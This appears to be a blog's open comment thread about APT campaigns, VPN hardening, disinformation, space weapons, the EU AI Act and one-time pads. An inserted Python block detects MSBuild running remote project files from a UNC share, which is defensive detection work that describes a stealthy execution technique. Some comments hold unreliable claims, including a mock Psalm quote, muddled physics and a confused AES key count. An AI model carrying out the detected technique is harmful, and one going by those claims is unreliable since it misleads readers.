You might have heard there are a lot of unhappy farmers just recently. Apparently their very high end tractors stopped working due to loss of data communications. The manufacturers are saying “Act of God” as it’s due to the Sun creating geo-magnetic issues.

I say that as the Solar Cycle is approx. 11 years, so it was entirely predictable and the manufacturers should not have designed their systems to fail to a known issue.

ResearcherZero May 20, 2024 11:10 PM

Some other search providers do not have advertising and have better results. If you want to use the original-style Google search, add the following URL as a search option to the browser.

{google:baseURL}/search?udm=14&q=%s

Further instructions can be found at the link below:

‘https://www.bleepingcomputer.com/news/google/frustration-grows-over-googles-ai-overviews-feature-how-to-disable/

Psalm 9:15-16

‘https://www.washingtonexaminer.com/news/justice/3004378/rudy-giuliani-hasnt-been-served-arizona-indictment-officials-cant-find-him/

Giuliani’s recent nightly live video streams alerted Arizona officials to his whereabouts.

https://eu.azcentral.com/story/news/politics/elections/2024/05/20/fake-electors-unredacted-indictment-released-by-arizona-attorney-generals-office/73771404007/

ResearcherZero May 20, 2024 11:22 PM

Hand-off procedures between attackers.

‘https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/

APT34 offshoots have used DNS redirection during their operations.
https://blog.talosintelligence.com/dnspionage-campaign-targets-middle-east/

Targeting executives, HR staff, and IT personnel.

‘https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign

“common code structure and choices of variable names”
https://securelist.com/lyceum-group-reborn/104586/

NCSC recommends replacing SSLVPN and WebVPN with options employing open standards.

‘https://thecyberexpress.com/replacement-of-sslvpn-and-webvpn/

Other governments have recommended the change to more secure standards for some time.
https://www.ncsc.gov.uk/collection/device-security-guidance/infrastructure/virtual-private-networks

NSA and CISA also recommend IKE/IPsec

‘https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/csi_selecting-hardening-remote-access-vpns-20210928.pdf

ResearcherZero May 21, 2024 12:10 AM

From memory, Psalm 9:15-16 states something along the lines of:

“Heathen, sinner, believer, show caution before zipping up your jeans.
Before committing to thy path, ensure first you dress in undergarment.”

He who forsakes the way of wisdom, the path of virtue, and thus becomes in proverbial language “a fool,” he shall remain… For the love of money is the root of all kinds of evil. By craving it, some have wandered away and pierced themselves with many sorrows.

This might be followed with the classic line:

“The honest man always yields to admit they have strayed from the righteous path.
If vanity protest the trap of one’s own fly. The sinner lets slip the terrible howl.”

lastoftheV8s May 21, 2024 12:35 AM

@Bruce @SchneieronSecurity would be in the Australian government best interest to see you bring everything you’ve got in your arsenal here in 2024 Melbourne Victoria 26-28 NOVEMBER imo humble opinion ‘sure as hell wouldn’t hurt’ right? given our errr UHM! somewhat schizophrenic policy decisions lately RE: cyber sec! Just on that i guess you get an invite right? anything in your inbox?….yet???
1] LINK BELOW.👇
https://www.cyber….conference….com.au/

ResearcherZero May 21, 2024 1:20 AM

“dangerously bombastic and oversimplified ways of talking about complicated dynamics”

‘https://www.wired.com/story/rfk-jr-election-denialism/

When think-tanks begin repeating Russian messaging, it undermines public confidence.
https://www.nytimes.com/2024/01/21/magazine/heritage-foundation-kevin-roberts.html

Rep. Michael McCaul, the Texas Republican who chairs the House Foreign Affairs Committee, told Puck News this month that Russian propaganda has “infected a good chunk of my party’s base,” threatening the Ukraine aid.

“To the extent that this propaganda takes hold, it makes it more difficult for us to really see this as an authoritarian versus democracy battle, which is what it is,” Turner said.

‘https://edition.cnn.com/2024/04/17/politics/republicans-russia-ukraine-what-matters/index.html

RFK Jr missed all of the Kremlin’s moves, along with the long term implications.
https://www.washingtonpost.com/politics/2024/05/08/rfk-jrs-history-lesson-russias-invasion-ukraine-flunks-fact-test/

It is extremely difficult to communicate clear messages to the population of a free society against the background noise of sustained disinformation campaigns.

Democracy depends on reliable information about the evidence for various policy options.

‘https://theconversation.com/disinformation-campaigns-are-undermining-democracy-heres-how-we-can-fight-back-217539

The goal is to achieve an “invisible manipulation” and “invisible embedding” of information production “to shape the target audience’s macro framework for recognizing, defining, and understanding events,” write Duan Wenling and Liu Jiali, professors of the Military Propaganda Teaching and Research Department of the School of Political Science at China’s National Defense University. A recent PLA Daily article lays out four social-media tactics, dubbed “confrontational actions”: Information Disturbance, Discourse Competition, Public Opinion Blackout, and Block Information.

https://www.oodaloop.com/archive/2023/11/08/cognitive-infrastructure-worldwide-is-under-attack-in-the-worst-cognitive-warfare-conditions-since-wwii/

lastoftheV8s May 21, 2024 2:51 AM

My bad and apologies @Bruce @ all re-posting ‘fractured link here’ https://w w w.cyberconference.com.au/ as the fractured link in my OP is US:

Winter May 21, 2024 2:56 AM

@ResearcherZero

It is extremely difficult to communicate clear messages to the population of a free society against the background noise of sustained disinformation campaigns.

You can focus on only ONE enemy at a time.

As the current threat to the American Way Of Life (aka, apartheid) is seen to come from the Democrats and Democracy itself (aka, non-white and non-male voters), the Russians must take a backseat.

lurker May 21, 2024 5:16 AM

@ResearcherZero

Psalm 9:15-16 must surely apply to the social media companies and their algorithms who provide the platform for adversarial disinformation. Metaphors of zip malfunction will be trivial when we arrive at the malfunction of society itself.

May your book bring defimation May 21, 2024 6:10 AM

“From memory, Psalm 9:15-16 states something along the lines of”

Perhaps it would be more appropriate to back up a bit. To find what some claim is the Bib Prayer of Psalms 9:11-14

11 Sing the praises of the Lord, enthroned in Zion;
proclaim among the nations what he has done.
12 For he who avenges blood remembers;
he does not ignore the cries of the afflicted.
13 Lord, see how my enemies persecute me!
Have mercy and lift me up from the gates of death,
14 that I may declare your praises
in the gates of Daughter Zion,
and there rejoice in your salvation.

Remember, you can, as many choose to do, make meaning from nonsense and call it truths. Further, you can say all who deny are Godless and shall be struck down to eternal perdition.

All in time for Nov 2024 when the lunatics will have their asylum or with gnashing of teeth and cries of exit poll “truths” claim proof of theft and fraud to go rampaging.

Is such idiocy really the way to run a country?

noname May 21, 2024 7:46 AM

The number of students studying computer and information science has risen from 444,000 to 628,000 in the last five years in the US. That’s a 40% increase.

It’s the fourth most popular major and the fastest growing of the top 20 majors.

But right now the job market isn’t as elastic as the supply. Many students are having to scramble and branch out where they look for work.

Whether this slows the computer science pipeline remains to be seen.

https://news.ycombinator.com/item?id=40414244

fib May 21, 2024 8:23 AM

The iPhone turns 17 this year. The launch of the touchscreen-controlled device signaled a moment that has defined our expectations of smartphones ever since.

A disgraceful milestone. My expectation for smartphones is nothing but the end of civilization. Almost all political radicalism poisoning the Western societies can be mapped to those infamous micro glass-and-plastic monoliths.

May Steve Jobs’ stomach roast in hell.

Anonymous May 21, 2024 1:24 PM

On iOS 17.5 you might have to reset Face ID from Settings > Face ID & Passcode.
To test it, just let a friend make a call from your iPhone after you’ve locked it.

lastoftheV8s May 21, 2024 3:19 PM

Shout out to @echo for gifting me especially “that will become clear in a sec” the community a damn good chuckle (no really it’s a ripper) i was reading your post re: ‘turtle tanks’ etc, yes i was aware of the turtle thingy but but wait what the hell are these cope cages? and what! the bloody hell is emotional support Armour? im thinking @echoes done his homework here righto! chaps i say my best Aussie slang masquerading as my finest Englishmen stiff upper lip type rip-off voice but we’re here for a laugh and this better be good @echo im thinking so into the breach we go and what a surprise ol mate @Perun is a bloody Aussie! this @echo bloke obviously knows more about me than i do and as an Aussie @Perun takes the absolute piss (as we say down here) out of himself that’s code for “yeah nah we’re going full self-deprecating mode here and by god he’s nailed it, so im still on old mate @Perun’s YouTube vid ill get to the other in good time and he’s a gamer me too 4 extra credits there! and speaking of us Aussies ‘taking the piss out of one’s self etc, etc, and the whole self-annihilation of one’s character all in the name of having a good ol belly laugh and hey you only live once right and life’s too short for too much idk “mind snapping serious effery ain’t it? so i gave myself the handle years ago when firing up Battlefield 3/4 “haveibeenpwned” love getting extra attention in game cos there’s always that player who gets the better of me and has just gotta remind me ‘yes you “havebeenpwned” pal!
PS i did email Troy Hunt after i took the “haveibeenpwned” handle as my in-game avatar name and politely told Troy i’ll cease and desist if he took umbrage with me using a name that’s well the name of his business right and i never heard back and Troy being another Aussie i reckon i’d like to think we’re all on the same page here anyways @echo nice job mate and a good read thank you for your effort.☮☮

lastoftheV8s May 21, 2024 6:22 PM

@echo ? i must admit i sometimes just cant decipher the tea leaves i apologize if i have caused you any discomfort here today from my reply to you earlier! certainly never my intention.☮☮

Future Red Olive Orchard 2067 May 21, 2024 8:23 PM

forum discussion topic idea: screengrabs and photos of internet-ready kiosks in the strangest (wrongest!) places

ResearcherZero May 22, 2024 1:58 AM

@May your book bring defimation

Re: Is such idiocy really the way to run a country?

No.

Clown cars generally belong in the circus. More a space for inconsistent, unreliable or unforeseen results. That does not seem like the appropriate arena for good policy outcomes.

“Policy makers now have more facts and theories at their disposal while the unintended consequences of policy are a widely recognized problem.”

Unanticipated consequences, so it seems, are disappearing from the literature because they are being called by another name: “unintended consequences.”

Rulers and policy reformers benefit from conflating “unintended” and “unanticipated” consequences because it helps shed responsibility and avoid discussion.

‘https://link.springer.com/article/10.1007/s11186-015-9247-6

‘https://www.airandspaceforces.com/russia-counterspace-weapon-near-us-satellite/

Directed-energy devices would probably be a part of any future system.

https://www.nytimes.com/2024/05/17/us/politics/pentagon-space-military-russia-china.html

“The Russian weapon is still under development and is not yet in orbit. If deployed, such a weapon could destroy satellites by creating a massive energy wave when detonated, potentially crippling a vast swath of the commercial and government satellites that the world below depends on to talk on cell phones, pay bills, and surf the internet.”

‘https://edition.cnn.com/2024/05/21/politics/us-assesses-russia-launched-counter-space-weapon/index.html

At present Russia has shown the most aggressive behavior in space.
https://www.csis.org/analysis/space-threat-assessment-2024

Nesting doll systems.

‘https://breakingdefense.com/2023/12/leolabs-russia-china-time-suspicious-space-activity-for-some-us-holidays/

Russia
https://www.thespacereview.com/article/4401/1

China tripled its intelligence, surveillance and reconnaissance satellites since 2018.
https://www.thespacereview.com/article/4431/1

“This implies that command and control capabilities may be present on presumed ‘zombie’ satellites.”

‘https://spacenews.com/leolabs-data-shows-on-orbit-maneuvers-by-russian-satellites/

lurker May 22, 2024 2:09 AM

Die weltt die will betrogen syn.
[The world wants to be deceived, so let it be deceived.]

attr. Sebastian Brant, Das Narrenschiff 1494 [The Ship of Fools]

500 years headstart on social media.

ResearcherZero May 22, 2024 2:12 AM

China has also “built a range of counterspace weapons, from reversible jamming all the way up to kinetic hit-to-kill direct-ascent and co-orbital ASATs,” Whiting said.

‘https://www.space.com/china-space-progress-breathtaking-speed-space-force

In 2018, Russia and China agreed on the joint application of GLONASS/Beidou.

Strategic collaboration between the two states in a contested, future-oriented domain like satellite technology could have serious implications for Ukraine, despite claims that such cooperation is in pursuit of ‘peaceful goals’.

In Ukraine, GLONASS has already enabled Russian missile and drone strikes via satellite correction and supported communications between Russian troops through its connection to Azart portable digital radios. The resulting Chinese footprint in Azart radios could help Russia expedite GLONASS/Beidou integration to improve satellite-driven tactical operations. Additionally, Russia could exploit Beidou’s ability to facilitate the navigation and tracking of autonomous vehicles for strategic attacks with missiles and drones.

https://www.rusi.org/explore-our-research/publications/commentary/hi-tech-high-risk-russo-chinese-cooperation-emerging-technologies

An initial 108 satellites of a total of around 12,000 G60 Starlink satellites are to be launched across 2024.

‘https://spacenews.com/first-satellite-for-chinese-g60-megaconstellation-rolls-off-assembly-line/

Winter May 22, 2024 5:57 AM

@ResearcherZero

despite claims that such cooperation is in pursuit of ‘peaceful goals’.

Note that cemeteries are very peaceful places.

Kant remarked that In Eternal Peace was the name of an inn next to a cemetery. That seems to be the kind of peace they go for.

Anonymous May 22, 2024 7:38 AM

@ResearcherZero
@Winter
@ALL

Is it speculation

“Directed-energy devices would probably be a part of any future system.”

Or a foregone conclusion?

Thus a disaster to condemn mankind to an untimely demise?

A study of history shows technology can be used for good or bad and in some cases the identical usage is both.

Thus this was predictable from before the space-race ever started and if you check much longer before that as even the space-race was predicted.

But as for “Directed-energy” devices, something people forget is that there are three basic types of transmitting energy:

  1. Conduction
  2. Radiation
  3. Convection

Where convection is, when considered with a little thought, the first two combined. And Radiation the result of Conduction.

To see why, consider kinetic energy. We know from the basic physics we get sort of taught at school that an object will take the energy from a source object and in effect ‘hold it indefinitely’ until it gives it up by some interaction with other objects.

The reality however is the energy is all to do with relative velocity and mass. Crudely, if you start an object moving in space we say something daft like

“It won’t stop until it hits something”

The reality is it imparts energy to another object that in turn has its velocity changed. But it does it as a vector addition. And if one or both objects break up they radiate in all directions, each taking some part of the interaction energy with it as relative velocity.

Somebody thought this through some years ago and realised that, no matter what energy source was used, the result would eventually be a form of convection, like Brownian Motion and other statistical mechanics; it was just a question of “scale”.

The first person to think through the problem was probably Albert Einstein back in the late 1800s, which culminated in his 1905 paper

“Investigations on the Theory of the Brownian Movement”

(republished by Dover Press of London in 1956).

We are still learning new things from that paper over a century later.

Among the more recent thinkers on the subject with regards to space satellites and objects in orbit are Donald Kessler and Burton G. Cour-Palais, who in 1978 published in the Journal of Geophysical Research

“Collision frequency of artificial satellites: The creation of a debris belt”

That inspired the term “Kessler Syndrome”

The physics of which says all directed energy systems will end up in the Brownian Motion of space junk that is the Kessler Syndrome, effectively

“Locking us out of space thus condemning the human race to an untimely death”.

As a side note, Donald Kessler was at the time a researcher in NASA’s Environmental Effects Office; the paper has now gone on to affect thinking in “climate change”

https://yaleclimateconnections.org/2012/04/the-climate-problem-weve-been-here-before/

Has the “clown car” stopped moving?

Winter May 22, 2024 8:46 AM

@Anonymous

Directed-energy devices would probably be a part of any future system.

Mass carries more momentum per joule than photons. I think grenades/rockets still beat anything made up of photons.

PS: Are you trying to channel Clive?

Bob Paddock May 22, 2024 11:06 AM

The 7th annual “Directed Energy Symposium” is September 11-12, 2024 in
National Harbor, MD. The “AI For Defense Summit” is the same date and time, in DC.

The “DoD Energy & Power Summit” is July 31-Aug 1, 2024 in DC.

They have become more selective about openly publishing the agendas for the events.

ResearcherZero May 22, 2024 7:53 PM

@Anonymous

Used in space, to fry electronics without blowing the satellite into pieces. That would be the general idea. Other options include shunting some so they burn up, or capture.

Blowing them up so that pieces continue to orbit the Earth would not be the ideal solution.
Microwave to fry circuits – or perhaps lasers that could push satellites would be safer.

The sun is a long way away. Disposing of satellites in the sun does not seem viable.
A Greek chap named Aristarchus of Samos had a crack at measuring the distance, about 1,700 years before Nicolaus Copernicus. He postulated it was a pretty f’ing long way away.

‘https://techcommunity.microsoft.com/t5/windows-it-pro-blog/vbscript-deprecation-timelines-and-next-steps/ba-p/4148301

“By setting the working directory to a remote location, MSBuild will search for a project file on that remote server. If a project file is found, MSBuild will execute the code it contains entirely in memory, leaving no traces on the victim’s machine.”

‘https://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/

Gh0stRAT is a 32-bit dynamic link library (DLL) written in C++ dating back to 2001.
Gh0st provides attackers with access (a client and server) and control of the system.

“One monk recalled watching his computer open Microsoft Outlook all on its own, attach documents to an email, and send that email to an unrecognized address, all without his input.”

‘https://www.forbesindia.com/printcontent/28462

So how might you find a Gh0st on your system?
https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox

Gh0stRAT is often delivered through spear-phishing campaigns and malicious attachments.

‘https://www.malwarebytes.com/blog/news/2020/06/higaisa

Gh0st RAT primarily targets government agencies, embassies, foreign ministries, and military offices. The first public version of Gh0st became available in 2008.

GhostNet
https://www.nytimes.com/2009/03/29/technology/29spy.html

ORB nodes can use a mixture of leased VPS, compromised routers, or both.

“Networks can be provisioned networks, which are made up of commercially leased VPS space that are managed by ORB network administrators, or they can be non-provisioned networks, which are often made up of compromised and end-of-life router and IoT devices. It is also possible for an ORB network to be a hybrid network combining both leased VPS devices and compromised devices.”

“We no longer operate in the world of “block and move on” where IPs are part of APT’s weaponization and C2 kill chain phase. Instead, infrastructure is a living artifact of an ORB network that is a distinct and evolving entity where the characteristics of IP infrastructure itself, including ports, services, and registration/hosting data, can be tracked as evolving behavior by the adversary administrator responsible for that ORB network.”

‘https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
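One defender-side way to look for the behaviour in that MSBuild quote, as an added example that is not taken from the comment or from the Bitdefender report: it scans constructed Sysmon-style process-creation records for MSBuild.exe started with a remote (UNC) working directory or pointed at a project file on a remote share. The field names follow Sysmon Event ID 1; the hosts, paths and IPs are made up.

```python
import re

# Constructed Sysmon-style process-creation (Event ID 1) records, one per line.
# Field names mirror Sysmon's; every host, path and IP here is made up.
SAMPLE_EVENTS = [
    # 1: MSBuild started with a UNC working directory and no project argument,
    #    the pattern the quoted Bitdefender text describes
    r'EventID=1 Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe '
    r'CommandLine="MSBuild.exe" CurrentDirectory=\\203.0.113.10\share\ '
    r'ParentImage=C:\Windows\System32\cmd.exe',
    # 2: an ordinary local build from a developer checkout (benign)
    r'EventID=1 Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe '
    r'CommandLine="MSBuild.exe App.csproj /t:Build" CurrentDirectory=C:\src\app\ '
    r'ParentImage=C:\Tools\VS\Common7\IDE\devenv.exe',
    # 3: MSBuild handed a project file on a remote share explicitly
    r'EventID=1 Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe '
    r'CommandLine="msbuild.exe \\203.0.113.10\share\build.xml" CurrentDirectory=C:\Users\alice\ '
    r'ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
    # 4: a non-MSBuild process with a UNC working directory (must not fire)
    r'EventID=1 Image=C:\Windows\explorer.exe CommandLine="explorer.exe" '
    r'CurrentDirectory=\\fileserver\public\ ParentImage=C:\Windows\System32\userinit.exe',
]

# key=value fields; values containing spaces are double-quoted in this feed.
_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
UNC_PREFIX = '\\\\'  # a literal \\ as in \\server\share


def parse_event(line):
    """Split one key=value record into a dict, stripping quotes from values."""
    fields = {}
    for key, raw in _FIELD.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    return fields


def _basename(path):
    return path.rsplit('\\', 1)[-1].lower()


def msbuild_remote_indicators(event):
    """Reasons this process-creation event matches, or [] if it does not."""
    if _basename(event.get('Image', '')) != 'msbuild.exe':
        return []
    reasons = []
    cwd = event.get('CurrentDirectory', '')
    # Everything after argv[0] that is not a /switch or -switch is a project path.
    args = event.get('CommandLine', '').split()[1:]
    projects = [a for a in args if not a.startswith(('/', '-'))]
    if cwd.startswith(UNC_PREFIX):
        reasons.append('working directory is a UNC path')
        if not projects:
            # With no project argument MSBuild picks a project file from the
            # working directory, here a remote share, and runs it in memory.
            reasons.append('no project file given; MSBuild will search the remote directory')
    if any(p.startswith(UNC_PREFIX) for p in projects):
        reasons.append('project file on a UNC path')
    return reasons


def scan(lines):
    """Return (record number, parent image, reasons) for each matching line."""
    findings = []
    for number, line in enumerate(lines, start=1):
        event = parse_event(line)
        reasons = msbuild_remote_indicators(event)
        if reasons:
            findings.append((number, event.get('ParentImage', ''), reasons))
    return findings


if __name__ == '__main__':
    for number, parent, reasons in scan(SAMPLE_EVENTS):
        print(f'record {number}: parent={parent}: ' + '; '.join(reasons))
```

A mapped drive letter would hide the UNC path from this check, so pair it with telemetry on drive mappings; the working-directory match is the one that covers the case where no project file appears on the command line at all.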

ResearcherZero May 22, 2024 8:05 PM

@Anonymous

Ideally not weaponising space would seem like a very good idea. However no one seems willing to compromise at this point in time. Everything so far has been weaponised, including the deep blue sea. Weaponised dolphins, porpoises and beluga whales.

There is even an explosive squid drone that can be fired out of a cannon.
People are even wound up and weaponised against themselves. It happens all the time.

‘https://spectrum.ieee.org/caltech-canon-launched-squid-drone

ResearcherZero May 23, 2024 12:04 AM

‘https://www.politico.com/news/2024/05/21/trump-classified-documents-bedroom-00159182

“strong evidence” that the former president “intended” to hide classified documents
https://edition.cnn.com/2024/05/21/politics/mar-a-lago-documents-walt-nauta-donald-trump/index.html

A cyber attack that took place against New Caledonia may originate from Russia.

‘https://www.lemonde.fr/en/pixels/article/2024/05/22/new-caledonia-cyberattack-denounced-by-authorities-is-not-quite-unprecedented_6672315_13.html

https://ioda.inetintel.cc.gatech.edu/country/NC?from=1715844319&until=1716362719

In just two weeks Russia, China and Iran produced nearly 400 articles in English about the protests. Russia seems to be antagonizing both pro-Israeli and pro-Palestinian groups.

‘https://www.nytimes.com/2024/05/02/business/media/campus-protests-russia-china-iran-us.html

Posts from Russian state media, Russian diplomats/commentators increased by 400%
https://www.nbcnews.com/news/investigations/russia-trying-exploit-americas-divisions-war-gaza-rcna149759

Moscow may be involved in pro-Palestinian red hands being daubed on Paris’s Shoah memorial

‘https://www.lemonde.fr/en/france/article/2024/05/22/red-hands-at-paris-shoah-memorial-investigation-points-to-foreign-interference_6672318_7.html

Ramallah lynching
https://www.theguardian.com/world/2001/jun/26/israel

Winter May 23, 2024 9:10 AM

@ResearcherZero

Everything seems duller and less informative without his expertise, wit and clever snark.

Indeed.

noname May 23, 2024 3:41 PM

@echo

I’m really interested in the EU AI Act’s prohibited AI practices (Article 5) and if they will have global carryover.

vas pup May 23, 2024 4:35 PM

US Air Force releases first in-flight photos of B-21 Raider, newest nuclear stealth bomber
https://www.yahoo.com/news/us-air-force-releases-first-163639778.html

“The U.S. Air Force released the first in-flight photos of its newest nuclear stealth bomber, the B-21 Raider, on Wednesday after defense officials confirmed the sleek military aircraft had taken to the sky in California.

The Air Force and Northrop Grumman, who manufactured the aircraft, unveiled the B-21, a new, long-range strike bomber capable of carrying nuclear weapons, in December 2022.

When the B-21 enters service, Ellsworth Air Force Base in South Dakota will be its central operating base and training center. Whiteman Air Force Base in Missouri and Dyess Air Force Base in Texas are listed as backup bases in the release.

“Designed to operate in tomorrow’s high-end threat environment, the B-21 will play a critical role in ensuring America’s enduring airpower capability,” the Air Force wrote on its website.

The B-21 will replace the military’s current B-1 and B-2 models, “becoming the backbone of the U.S. Air Force bomber fleet.”

The B-21 is the first new American bomber aircraft in more than 30 years, and is one of six under production, according to the Air Force. The Air Force previously reported it expects to eventually have at least 100 of the new bombers.”

echo May 23, 2024 7:09 PM

@noname

I’m really interested in the EU AI Act’s prohibited AI practices (Article 5) and if they will have global carryover.

Good question. I had a draft I never published in the new AI topic which touched on the underlying issues and didn’t publish it. I only discovered the EU AI Act covered it after reading a legal commentary on Article 5 after you asked the question. Thanks!

I can’t say it will have global carryover but I think it’s likely given the issues have overlap with regulated professions and duties of care.

* Subliminal, manipulative and deceptive systems. AI systems that deploy subliminal techniques beyond a person’s consciousness or purposefully use manipulative or deceptive techniques that materially distort people’s behavior by appreciably impairing their ability to make informed decisions. Such systems cause people to make decisions that they would not have otherwise taken, [likely] resulting in significant harm.

* Exploiting vulnerabilities. AI systems that exploit people’s vulnerabilities due to their age, disability, or social or economic situation. Such systems also distort people’s behavior, [likely] resulting in significant harm.

This may make people jumpy. Lawyers in general, psychiatric medical professionals, and NGO’s representing vulnerable people might object to AI without more research into its consequences.

Biometric categorization. AI systems that categorize individual natural persons based on their biometric data to deduce or infer their race, political opinions, trade union membership, religious or philosophical beliefs, sex life, or sexual orientation. Importantly, the processing of biometric data for the purpose of uniquely identifying an individual is subject to strict restrictions under the GDPR. Such processing is prohibited unless one of the limited exceptions applies, such as the data subject’s explicit consent.

Ooof. This is going to be fun.

lastoftheV8s May 23, 2024 10:58 PM

Off the back of this article by @Bruce’s blog post dated “Posted on July 17, 2017 at 6:29 AM” https://www.schneier.com/blog/archives/2017/07/australia_consi.html… I’m not making this up and I will hunt down my original post regarding the somewhat bat@hi% crazy policy I wrote to “Electronic Frontiers Australia”, telling the story of me calling up A.S.I.O https://www.asio.gov.au/ “Australian Security Intelligence Organization”. Yes, I did ring em up and it was quite enlightening. So please stand by, I’ll go on the hunt for my post to EFA. I know it exists, I found it a while back and did not bookmark it, but yeah, I’ll be back. ☮

lastoftheV8s May 23, 2024 11:23 PM

My short encounter phone call with A.S.I.O: what I didn’t mention in my OP was when the employee at ASIO picked up I realised ‘how do I address these employees?? Like, is it excuse me ‘officer’, or special agent, or what??’ So I said ‘Hello, I’m … from …, are you the quote ‘phone boy’ or errr idk how do I address you sir??’ He said: ‘whattya want mate??’ OK then I started my rant? statement idk I got flustered. Anyway, link below.

Quote: “I’m not making this up. A few weeks back now I rang ASIO, told him who I was, where I was calling from, mobile number showing, re: facial recognition/the so called “capability”, my driver’s licence photo, 3rd parties, fed gov track record on keeping our digital records etc etc concerns, about a 5 min call. I spoke to a bloke and straight off the bat he just grunted and made various other noises like ah uh’ ah uh’m mm’ m mm’ kinda thing, then I got the ol’ quote ‘bit dramatic eh m8, bit dramatic’ end quote… he said he would pass it on??? ya u do that officer…
Comment by amibeingpwned on 26 November 2017 at 11:13”

https://webarchive.nla.gov.au/awa/20181122145110/http://pandora.nla.gov.au/pan/10264/20181123-0000/www.efa.org.au/2017/10/06/face-database-free-society/index.html

lastoftheV8s May 23, 2024 11:32 PM

I’m imagining that ASIO employee over drinks at the pub that night was telling his mates: ‘Some clown from… rang me today, he was from… and he said this and that etc, etc.’ ‘What did you say to said clown??’ ‘I told him he was being dramatic and I’ll pass it on.’

‘I’ll run a trace on him, ya nvr know right?’ ‘Good idea Bob or Trev or ???’ Anyway, I was not trying to be an A hole, I don’t ring ASIO every week you know! Just sayin.

lastoftheV8s May 23, 2024 11:57 PM

I remember mentioning to said ASIO officer/employee about a sunset clause on search warrants. OK, I think that’s when I got the ‘bit dramatic mate’ quip, idk from memory, OK that’s fine… so I rang the Attorney General’s dept in Canberra. I unknowingly did this lady’s head in with a bunch of questions like…
Do officers need a search warrant to search an individual’s digital data/meta?? I did not get an answer… I asked if a search warrant is necessary, is there a sunset clause?… did not get an answer… can I speak to someone who might be able to help me with my line of inquiries???… then with raised voice she blurted out “STOP STOP, I’ll get someone to call you back.”

lastoftheV8s May 24, 2024 6:00 AM

End-to-end encryption trends and challenges — position statement

https://www.esafety.gov.au/industry/tech-trends-and-challenges/end-end-encryption

This is the position of Australia's e-safety commissioner….

Advice for users:

👉"Users are advised to take extra care when communicating on services.that use end-to-end encryption, particularly when they do not know the person they are communicating with. It’s especially important to remember that any form of encryption can heighten the risk of concealed online interaction between adults and children."👈

Me… Now for my own insanity I’d like to retort!

Me… Excuse me commissioner, can we go back to the ‘users are advised’ bit please!

FBI seems kinda tipsy topsy turvy lately May 24, 2024 3:35 PM

Be careful, even some alleged antispam sites (stopforumspam) might be phishing sites.
For example, if you give them a bunch of truthful info and your true mailing address and they still won’t process the submission data form, then maybe it’s just stealing your info.

There are other sites that claim to be “helpers” for computer users, but are really just attack sites in disguise.

lurker May 25, 2024 1:10 AM

@lastoftheV8s
“Users are advised to take extra care when communicating on services that use end-to-end encryption, particularly when they do not know the person they are communicating with.”

I don’t have a mathematical proof, but even if there is so-called end-to-end encryption, when you don’t know the person you’re communicating with, what is your level of trust? This is a vital factor in your security.

echo May 25, 2024 1:53 AM

I don’t have a mathematical proof, but even if there is so-called end-to-end encryption, when you don’t know the person you’re communicating with, what is your level of trust? This is a vital factor in your security.

100% this. Anyone attacking relationship and sex and gender lessons is creating an abusers’ charter. No guesses who the largest and shoutiest organisation is who wants to dismantle it: the Catholic Church and various fellow travelers.

I have my own security protocols and thoughts on this subject. To boil it all down, I think if there’s one red flag anyone can relate to, it’s anyone wanting to carve someone out of the herd, i.e. take it private. If anything happens which doesn’t stand up against known good standards, that’s another red flag. If anything feels off, RUN.

I’ve heard parents say how they did everything right and something bad still happened. The one thing I can glean from this is if a child seems unusually quiet or emotional or withdrawn it’s a red flag.

ResearcherZero May 25, 2024 3:02 AM

@lastoftheV8s

Yes they do need a warrant. It depends if you are worth the time. But perhaps they might use you for a training exercise.

Don’t send them flowers for Valentines.

Clive ideas fan May 25, 2024 10:56 AM

@lurker
@lastoftheV8s

“I don’t have a mathematical proof, but even if there is so-called end-to-end encryption, when you don’t know the person you’re communicating with, what is your level of trust? This is a vital factor in your security.”

A sensible answer rather than…

The level of trust rather depends on “information” that is known to both parties but not to any other parties.

It is used as “A root of trust” to show the first and second parties are “probably” who they say they are.

This has been discussed before on this blog and it only deals with the security of the information not the parties.

With conventional encryption it actually takes very few bits of information to show that a decryption key is the only valid decryption key. Shannon called this “unicity distance” and it applies to nearly all encryption key systems where the key is shorter than the message.

https://en.m.wikipedia.org/wiki/Unicity_distance

However, if the key is one bit longer than the message or longer, the possibility for other keys that give the same message increases. For instance with AES with 128 bit keys, for a one bit message 2^127 keys, i.e. half of them, will give the correct answer.

This means that you can have two or more valid messages from the same ciphertext under different keys. The only way to tell is by the plaintext statistics, which is one of the reasons to use “chain encryption” or “super encryption” systems.

https://en.m.wikipedia.org/wiki/Multiple_encryption

As @Clive Robinson has pointed out Shannon “perfect secrecy” systems necessarily raise a real issue. The way they work means

“All messages are equiprobable from the same ciphertext.”

So with the issue that all bits in the keytext are fully independent of each other, there is no way to know if you have the right keytext thus the right plaintext.

As @Clive Robinson pointed out this gives

“Deniability against betrayal by the receiving party.”

That is if you encrypt a message padded out to a standard length with a One Time Pad nobody else knows what the plaintext is for the sent ciphertext. If the receiving party uses the corresponding One Time Pad they get the padded plaintext back.

But what if the receiving party makes a fake One Time Pad after receiving the ciphertext? They can make the plaintext be anything they want. So they can give the fake One Time Pad to a third party who already has the transmitted ciphertext.

Thus the plaintext the third party gets can be anything the receiving party wants.

But the same trick works the other way. That is the transmitting party can supply any fake one time pad they want that gives an entirely different plaintext.

Even if both the transmitting and receiving parties are giving a third party their keytext, even if they are the same, the third party has no way to know what the real plaintext was.

This means the OTP has strong deniability.

It also means that all plaintexts are untrustworthy.

So when you ask

“what is your level of trust? This is a vital factor in your security.”

At the encryption layer it’s effectively “zero”.

@Clive Robinson did go on to expand the system to show that, by using redundancy in plaintext at a high level (words, sentences), you could send a plaintext message that looks entirely innocent but has a covert message hidden inside it, using Perfect Secrecy to make the covert channel.

